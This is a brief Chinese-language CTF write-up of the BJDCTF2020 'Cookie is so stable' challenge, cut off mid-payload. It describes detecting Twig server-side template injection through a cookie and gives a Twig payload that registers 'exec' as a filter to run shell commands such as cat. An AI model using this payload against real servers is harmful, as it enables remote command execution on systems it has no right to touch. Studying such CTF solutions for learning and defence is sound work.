[BJDCTF2020]Cookie is so stable

ssti Twig模板注入 發現這個輸入框存在ssti漏洞。 如果輸出49那麼是Twig，如果是7777777那麼就是jinja 在源代碼中可以發現提示: 這條提示說明注入點在cookie。 修改cookie得到flag payload:{{_self.env.registerUndefinedFilterCallback(「exec」)}}{{_self.env.getFilter(「cat /

>>阅读原文<<